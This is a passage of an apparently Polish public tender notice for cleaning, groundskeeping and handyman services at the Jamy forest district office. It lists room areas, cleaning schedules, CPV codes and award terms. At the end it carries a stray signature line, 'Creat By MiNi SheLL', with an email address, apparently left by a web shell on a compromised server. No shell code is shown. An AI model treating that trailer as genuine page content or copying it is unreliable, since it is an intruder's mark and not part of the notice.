-	pomieszczenie nr 6 (archiwum)* 		- 15,00 m2
-	pomieszczenie nr 7 (pom. gosp.) 		- 11,00 m2
-	komunikacja 					- 31,60 m2
151,80 m2

2. Parter
-	pokój nr 1 (dz. techniczny) 			- 10,34 m2
-	pokój nr 2 (nadleśniczy) 				- 16,40 m2
-	pokój nr 2a (kancelaria)* 				-   7,62 m2
-	pokój nr 3 (sekretariat) 				- 18,50 m2
-	pokój nr 3a (serwerownia)*			-   4,35 m2
-	pokój nr 4 (księgowość) 				- 16,60 m2
-	pokój nr 5 (administracja 				- 14,70 m2
-	pokój nr 6 (administracja) 			- 13,30 m2
-	pokój nr 7 (gł. księgowy) 				- 12,50 m2
-	pokój nr 8 (księgowość) 				- 16,30 m2
-	pokój nr 9 (kasa) 					- 11,50 m2
-	pomieszczenia wc 				- 13,85 m2
-	komunikacja 					- 42,50 m2
-	wiatrołap 						- 12,30 m2
210,76 m2

3. I Piętro
-	pokój nr 10 (z-ca nadleśniczego)			- 17,05 m2
-	pokój nr 11 (dz. techniczny)			- 25,74 m2
-	pokój nr 12 (dz. techniczny)			- 13,40 m2
-	pokój nr 13 (dz. techniczny) 			-   7,90 m2
-	pokój nr 14 (straż leśna) 				- 17,01 m2
-	pokój nr 15 (świetlica) 				- 50,20 m2
-	pokój nr 16 (ksero) 				- 13,12 m2
-	pokój nr 17 (inż. nadzoru)			- 15,50 m2
-	magazynek straży leśnej *			-   2,12 m2
-	pomieszczenia wc 				- 14,40 m2
-	komunikacja 					- 29,30 m2
-	taras						- 11,16 m2
216,90 m2

4. Mieszkanie gościnne
-	pokój mały						- 14,70 m2
-	pokój mały						- 12,65 m2
-	aneks kuchenny					-   7,14 m2
-	łazienka						-   3,80 m2
-	komunikacja					-   9,30 m2
-	taras 						- 11,16 m2
   58,75 m2
II. Budynek warsztatu przy Nadleśnictwie Jamy w m. Jamy 5, gm. Rogóźno

1. Pomieszczenie socjalne
-	jadalnia z korytarzem	11,88 m2
-	szatnia 	7,48 m2	
-	łazienka i wc	9,94 m2
	    29,30 m2


III. Domek letniskowy nad j. Kuchnia w m. Szembruk, gm. Rogóźno

1. Pomieszczenia domku letniskowego
-	pokój duży (parter)	15,75 m2	
-	pokój mały (piętro)	15,30 m2
-	kuchnia 	2,16 m2	
-	łazienka z wc 	2,88 m2			
-	przedsionek 	1,53 m2			
-	pomieszczenie gospodarcze 	15,75 m2			
-	tarasy 	23,07m2
 	76,44 m2


Razem: 
I. Budynek biurowo-mieszkalny Nadleśnictwa Jamy	638,21 m2	 
II. Budynek warsztatu przy Nadleśnictwie Jamy 		  29,30 m2
III. Domek letniskowy nad j. Kuchnia 			  76,44 m2
								743,95 m2

Objaśnienia:
* W pomieszczeniach oznaczonych gwiazdką sprzątanie tylko na zlecenie i w obecności osoby odpowiedzialnej za te pomieszczenia.

Szczegółowy zakres zadań dot. części zamówienia nr 1:

I. Budynek biurowo-mieszkalny Nadleśnictwa Jamy w m. Jamy 5, gm. Rogóźno

1) Pomieszczenia biurowe i wc:
a)	Codziennie: 	- zamiatanie i mycie podłóg
- wycieranie kurzu z mebli biurowych, sprzętu biurowego, parapetów
- opróżnianie koszy na śmieci
- mycie, dezynfekcja umywalek i urządzeń sanitarnych
- wykładanie papieru toaletowego, ręczniczków papierowych i mydła we wszystkich
pomieszczeniach sanitarnych

b)	Raz  na  tydzień: 	- podlewanie i odkurzanie kwiatów - umycie płytek na ścianach w pomieszczeniach sanitarnych i wc

c)	Raz w miesiącu: 	-     pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z szaf, wiszących lamp, obrazów i tablic
-	mycie okien, parapetów, drzwi, balustrad i krat w oknach
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu

d)	Nie rzadziej niż raz na kwartał: 	- pranie firan

e) 	W okresie wiosenno-letnim
- posadzenie i pielęgnacja kwiatów na tarasie

f) 	Wg potrzeb
- przygotowanie naczyń i poczęstunku na narady, szkolenia, spotkania okolicznościowe
- sprzątanie i mycie naczyń po naradach, szkoleniach, spotkaniach okolicznościowych
- mycie naczyń po gościach u nadleśniczego i zastępcy nadleśniczego,

2) Pomieszczenia piwniczne (magazyn, archiwum)
a) 	Raz na kwartał:
- dokładne zamiecenie podłóg
- mycie okien, drzwi, krat i balustrad

3) Pomieszczenie gospodarcze w piwnicy
a)	Raz w tygodniu: 	- zamiatanie i mycie podłóg
- wycieranie kurzu z regałów półkowych
- opróżnianie koszy na śmieci
- mycie, dezynfekcja umywalek
- wykładanie ręczniczków papierowych i mydła

b)	Raz na kwartał: - mycie okien i drzwi

4) Mieszkanie gościnne
a) 	Wg potrzeb:
-	przygotowanie pościeli
-	zamiatanie i mycie podłóg
-     mycie, dezynfekcja umywalki i urządzeń sanitarnych
-	wycieranie kurzu z mebli, parapetów i obudowy kominka
-	mycie i dezynfekcja lodówki
-	mycie i dezynfekcja zlewozmywaka w kuchni
-	mycie maszynki elektrycznej do gotowania
-	mycie zmywarki
-	wykładanie papieru toaletowego w łazience
-	opróżnianie kosza na śmieci
-	utrzymanie czystości na klatce schodowej i na tarasie 

b)	Nie rzadziej niż raz na kwartał: 	-    pranie firan
	-    pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z szaf, wiszących lamp, obrazów i półek
-	mycie okien, parapetów, drzwi i balustrad
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu
-	wytrzepanie z kurzu chodnika dywanowego i koców
-	umycie płytek na ścianach w łazience



II. Budynek warsztatu przy Nadleśnictwie Jamy w m. Jamy 5, gm. Rogóźno

1) Pomieszczenie socjalne
a) 	Raz w tygodniu
-	zamiatanie i mycie podłóg
-    mycie, dezynfekcja umywalek i urządzeń sanitarnych
-	wycieranie kurzu z mebli i parapetów
-	wykładanie papieru toaletowego w łazience
-	opróżnianie kosza na śmieci

b)	Nie rzadziej niż raz na kwartał: -     dokładne starcie kurzu z szaf, wiszących lamp i półek
-	mycie okien, parapetów i drzwi
-	odkurzanie ścian, sufitów, gzymsów, grzejników i kratek wentylacyjnych z pajęczyn i kurzu
-	umycie płytek na ścianach w pomieszczeniach sanitarnych i wc


III. Domek letniskowy nad j. Kuchnia w m. Szembruk, gm. Rogóźno

1) Domek letniskowy nad j. Kuchnia
a)	Przed sezonem letnim 
-	zamiecenie i umycie podłóg
-	pastowanie i polerowanie podłóg
-	dokładne starcie kurzu z mebli, wiszących półek i lamp
-	wymycie szafek kuchennych wewnątrz i na zewnątrz
-	odkurzenie ścian i sufitów z pajęczyn i kurzu
-	umycie okien i drzwi
-	wypranie i powieszenie firanek
-	zamiecenie, zmycie podłóg i balustrad na tarasach
-	umycie i zdezynfekowanie umywalki, zlewozmywaka i urządzeń sanitarnych
-	wyłożenie papieru toaletowego, ręczniczków papierowych i mydła w pomieszczeniu wc
-	dokładne umycie i przygotowanie naczyń i garnków w kuchni
-	umycie i zdezynfekowanie lodówki
-	umycie maszynki elektrycznej do gotowania
-	odkurzenie tapczanów i materacy
-	wytrzepanie koców lub w razie potrzeby przekazanie ich do czyszczenia chem.
-	umycie i przygotowanie mebli ogrodowych
-	umycie i przygotowanie grilla ogrodowego

b)	Po sezonie letnim 
-    wszystkie czynności j. w. + zabezpieczenie wyposażenia przed zimą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.91.00.00-9, 98.39.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie czystości wokół siedziby Nadleśnictwa Jamy oraz świadczenie drobnych  usług gospodarczych w zależności od potrzeb dla Nadleśnictwa Jamy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Utrzymanie czystości wokół siedziby Nadleśnictwa Jamy, pod pojęciem którego należy rozumieć teren/y (wg mapki poglądowej, która stanowi załącznik nr 1 do SIWZ):
-	d tylnej bramy wjazdowej (znajdującej się przy budynku warsztatowym nadleśnictwa) do rozwidlenia dróg (za osadą Nadleśniczego) - od strony szosy asfaltowej;
-	podwórza wokół budynku-biurowego nadleśnictwa i pozostałych budynków, w tym m.in. tereny zielone, park maszyn, myjnia płytowa;
-	od bramy wjazdowej do magazynu paliw;
-	teren zielony przed budynkiem mieszkalnym 6-rodzinnym w m.Jamy 16.

Szczegółowy zakres zadań dot. części zamówienia nr 2:

1. W okresie wiosennym i letnim
a)	Codziennie
-	usuwanie śmieci z zainstalowanych koszy
-	zbieranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.
-	zamiatanie terenu przy wejściu do biura

b)	Wg potrzeb
-	utrzymanie terenów zieleni, w tym: koszenie i podlewanie traw
-	wykaszanie chwastów
-	cięcie żywopłotu, pielęgnacja drzewek i innych roślin ozdobnych

2. W okresie jesiennym i zimowym
a)	Codziennie
-	usuwanie śmieci z zainstalowanych koszy
-	zbieranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.
-	zamiatanie terenu przy wejściu do biura

b)	Wg potrzeb
-    grabienie i usuwanie liści 
-	usuwanie śniegu i błota pośniegowego ze schodów oraz przyległego terenu przy wejściu do biurowca oraz na parkingu 
-	usuwanie zlodowaceń ze schodów oraz z przyległego do nich terenu poprzez posypywanie piaskiem i solą

II. Świadczenie drobnych  usług gospodarczych w zależności od potrzeb dla Nadleśnictwa Jamy:
-	za- i rozładunek materiałów do magazynu nadleśnictwa,
-	drobne naprawy w biurze nadleśnictwa i jego otoczeniu,
-	konserwacja i drobne naprawy sprzętu,
-	przenoszenie sprzętu biurowego i mebli w związku z ewentualnym remontem budynku,
-	prace porządkowe przy domku letniskowym nadleśnictwa nad j. Kuchnia w m. Szembruk, gm. Rogóźno 
(wg potrzeb: koszenie traw, wykaszanie chwastów, cięcie żywopłotu, zgrabienie i usunięcie liści oraz zebranie porozrzucanych papierów i innych nieczystości, takich jak butelki, złom, gałęzie itp.)
Przewidywana ilość godzin do przepracowania w okresie trwania umowy: 300h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 77.30.00.00-3, 90.62.00.00-9, 90.63.00.00-2, 98.39.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com